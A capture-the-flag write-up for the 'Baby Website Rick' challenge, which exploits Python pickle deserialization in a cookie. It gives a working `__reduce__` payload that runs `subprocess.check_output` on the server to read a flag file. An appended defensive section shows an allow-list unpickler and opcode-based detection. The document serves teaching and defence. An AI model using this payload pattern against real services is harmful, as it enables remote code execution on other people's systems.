# Baby Website Rick

We are presented with a web application that seems to point to some form of pickle deserialization attack from the start.

We can also see that a suspicious looking base64 string is encoded in the cookie, which seems to be a pickle object.

We can first try to decode the existing pickle object with `pickle.loads`. The pickle references `__main__.anti_pickle_serum`, so a stub class of that name has to exist for the unpickler to reconstruct the object.

```python
import pickle
import base64

# Cookie value copied from the browser (standard base64 of a protocol-0 pickle)
data = 'KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwphbnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu'

# Stub for the class the pickle refers to; it only needs to be resolvable
# as __main__.anti_pickle_serum, its body does not matter
class anti_pickle_serum(object):
    pass

obj = pickle.loads(base64.b64decode(data))
print(obj)
```

Output:

```
┌──(kali㉿kali)-[~/Desktop/CTF/Web/Baby Website Rick]
└─$ python2 decode.py
{'serum': <__main__.anti_pickle_serum object at 0x7f8b351843d0>}
```

We can now craft our payload based on [this article](https://davidhamann.de/2020/04/05/exploiting-python-pickle/), using the `__reduce__` method to specify the callable (and its arguments) that the unpickler will invoke.

After some trial and error, I realized that `os.system()` doesn't directly return my command output, which is why I opted for `subprocess.check_output`, as it captures the standard output of the external command as a string and returns it.

```python
import pickle
import base64
import subprocess

class RCEStr(object):
    # __reduce__ tells the unpickler which callable to invoke and with which
    # arguments; check_output returns the command's stdout, whereas os.system
    # would only return the exit status
    def __reduce__(self):
        return (subprocess.check_output, (['cat', 'flag_wIp1b'],))

# protocol 0 matches the cookie the application issues (see the hint below)
pickle_data = pickle.dumps({'serum': RCEStr()}, protocol=0)
payload = base64.urlsafe_b64encode(pickle_data)
print(payload.decode('utf-8'))
```

{% hint style="info" %}
Pickle's protocol version, as well as the version of Python you are using, might matter here: I only got it to work with Python 2 and protocol 0.
{% endhint %}
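The reason the payload above works is that the unpickler resolves any `module.name` the stream asks for and then calls it. As an added defender-side example (not code from the writeup), the following Python 3 snippet first walks the cookie's opcodes with `pickletools` to list the globals it would import without executing anything, then unpickles under an allow-list that accepts the application's original `anti_pickle_serum` cookie and refuses any other global. The stub class, the allow-list and the constructed probe cookie (a `GLOBAL`/`REDUCE` pickle with `json.dumps` standing in for the subprocess call) are assumptions for this example.

```python
import base64
import importlib
import io
import pickle
import pickletools

# Benign cookie value taken from the challenge page (protocol-0 pickle, base64).
BENIGN_COOKIE = ('KGRwMApTJ3NlcnVtJwpwMQpjY29weV9yZWcKX3JlY29uc3RydWN0b3IKcDIKKGNfX21haW5fXwph'
                 'bnRpX3BpY2tsZV9zZXJ1bQpwMwpjX19idWlsdGluX18Kb2JqZWN0CnA0Ck50cDUKUnA2CnMu')
# Constructed cookie with the shape of a __reduce__ payload: GLOBAL, args tuple, REDUCE.
# json.dumps stands in for subprocess.check_output so the sample is harmless to load.
PROBE_COOKIE = base64.urlsafe_b64encode(
    b"(dp0\nS'serum'\np1\ncjson\ndumps\np2\n(S'probe'\np3\ntp4\nRp5\ns.").decode()

class anti_pickle_serum(object):
    """Stub for the class the cookie references (assumed, as in the writeup)."""

# (module, name) pairs the benign cookie needs, as written in the stream; all else is refused.
ALLOWED_GLOBALS = {('copy_reg', '_reconstructor'), ('__main__', 'anti_pickle_serum'),
                   ('__builtin__', 'object')}
PY2_MODULE_MAP = {'copy_reg': 'copyreg', '__builtin__': 'builtins'}

def list_globals(raw):
    """Every (module, name) the pickle would import, found by walking opcodes (nothing runs)."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(raw):
        if op.name == 'GLOBAL':                        # protocol 0-3: arg is 'module name'
            found.append(tuple(arg.split(' ', 1)))
        elif op.name == 'STACK_GLOBAL':                # protocol 4+: module, name pushed as strings
            found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found

def cookie_globals(cookie):
    """Globals referenced by a base64 cookie (either base64 alphabet is accepted)."""
    return list_globals(base64.urlsafe_b64decode(cookie))

class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves allow-listed globals; anything else raises."""
    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError('forbidden global %s.%s' % (module, name))
        if (module, name) == ('__main__', 'anti_pickle_serum'):
            return anti_pickle_serum                   # resolve to the local stub explicitly
        return getattr(importlib.import_module(PY2_MODULE_MAP.get(module, module)), name)

def load_cookie(cookie):
    """Return the unpickled object, or None when the cookie asks for a forbidden global."""
    try:
        return RestrictedUnpickler(io.BytesIO(base64.urlsafe_b64decode(cookie))).load()
    except pickle.UnpicklingError:
        return None
```

Logging the `(module, name)` pairs that `cookie_globals` reports on a refused cookie gives a detection signal for this attack without ever executing the payload.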
